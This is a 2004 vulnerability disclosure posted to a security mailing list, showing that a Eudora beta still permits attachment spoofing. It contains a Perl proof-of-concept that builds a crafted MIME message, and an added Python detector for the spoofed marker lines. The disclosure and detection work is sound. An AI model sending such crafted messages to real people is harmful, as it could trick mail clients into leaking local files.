Eudora 6.2.0.7 attachment spoof

From: Paul Szabo (psz_at_MATHS.USYD.EDU.AU)
Date: 10/11/04

    Date:         Mon, 11 Oct 2004 08:23:53 +1000
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM
    
    

    Eudora 6.2.0.7 for Windows has been in beta testing since 8 Oct 2004. The release
    notes
    http://www.eudora.com/download/eudora/windows/6.2/Betas/RelNotes.txt
    say:

    > SECURITY
    > --------
    > Fixed cases where attachments could be spoofed via base64 or quoted-printable
    > encoded (plain-text, inline) MIME parts.

    Not so. Harmless demo below.

    Cheers,

    Paul Szabo - psz@maths.usyd.edu.au http://www.maths.usyd.edu.au:8000/u/psz/
    School of Mathematics and Statistics University of Sydney 2006 Australia

    #!/usr/bin/perl --

    use MIME::Base64;

    print "From: me\n";
    print "To: you\n";
    print "Subject: Eudora 6.2.0.7 on Windows spoof\n";
    print "MIME-Version: 1.0\n";
    print "Content-Type: multipart/mixed; boundary=\"zzz\"\n";
    print "X-Use: Pipe the output of this script into: sendmail -i victim\n\n";

    print "--zzz\n";
    print "Content-Type: text/plain\n";
    print "Content-Transfer-Encoding: 7bit\n\n";
    print "With spoofed attachments, we could 'steal' files (after a warning?)
    if the message was forwarded (not replied to).\n";

    print "\n--zzz\n";
    print "Content-Type: text/html; name=\"qp.txt\"\n";
    print "Content-Transfer-Encoding: quoted-printable \n";
    print "Content-Disposition: inline; filename=\"qp.txt\"\n\n";
    print "Within text/html part, use </x-html> to get back to plaintext,
    no need for NUL or linebreak or nothing:
    </x-html>\n";
    print "Attachment Converted=00: \"c:\\winnt\\system32\\calc.exe\"\n";
    print "Attachment Converted=
    : \"c:\\winnt\\system32\\calc.exe\"\n";
    print "Attachment Converted: \"c:\\winnt\\system32\\calc.exe\"\n";

    print "\n--zzz--\n";
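
A gateway-side check for the marker lines the demo above prints, as an added example that is not part of the original post: it decodes each text part by hand (quoted-printable or base64, tolerating the padded encoding name seen in the demo's header), drops NUL bytes, and reports every `Attachment Converted:` line. The function names, the sample message and its placeholder paths are constructed here, and treating any such line in inbound mail as suspect is an assumption.

```python
import base64
import quopri
import re
from email import message_from_bytes

# Marker text as printed by the demo script in the post.
MARKER = re.compile(rb'^[ \t]*Attachment Converted[ \t]*:[ \t]*"([^"]*)"', re.I | re.M)

def decoded_body(part):
    """Decode one leaf part by hand, tolerating padding around the encoding name."""
    cte = str(part.get("Content-Transfer-Encoding", "7bit")).strip().lower()
    raw = part.get_payload(decode=False)
    raw = raw.encode("ascii", "surrogateescape") if isinstance(raw, str) else b""
    if cte == "quoted-printable":
        return quopri.decodestring(raw)  # resolves =XX escapes and soft line breaks
    if cte == "base64":
        try:
            return base64.b64decode(raw)
        except ValueError:
            return raw
    return raw

def find_spoofed_markers(raw_message):
    """Return (content_type, quoted_path) for each marker line in any text part."""
    hits = []
    for part in message_from_bytes(raw_message).walk():
        if part.is_multipart() or part.get_content_maintype() != "text":
            continue
        body = decoded_body(part).replace(b"\x00", b"")  # NULs must not hide the marker
        for m in MARKER.finditer(body):
            hits.append((part.get_content_type(), m.group(1).decode("latin-1")))
    return hits

# Constructed sample with the same layout as the demo; the paths are placeholders.
SAMPLE = (
    b"From: me\nTo: you\nSubject: constructed sample\nMIME-Version: 1.0\n"
    b'Content-Type: multipart/mixed; boundary="zzz"\n\n'
    b"--zzz\nContent-Type: text/plain\nContent-Transfer-Encoding: 7bit\n\n"
    b"ordinary body text\n"
    b'\n--zzz\nContent-Type: text/html; name="qp.txt"\n'
    b"Content-Transfer-Encoding: quoted-printable \n"
    b'Content-Disposition: inline; filename="qp.txt"\n\n</x-html>\n'
    b'Attachment Converted=00: "C:\\example\\one.bin"\n'
    b'Attachment Converted=\n: "C:\\example\\two.bin"\n'
    b'Attachment Converted: "C:\\example\\three.bin"\n'
    b"\n--zzz--\n"
)

if __name__ == "__main__":
    for ctype, path in find_spoofed_markers(SAMPLE):
        print(ctype, path)
```
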
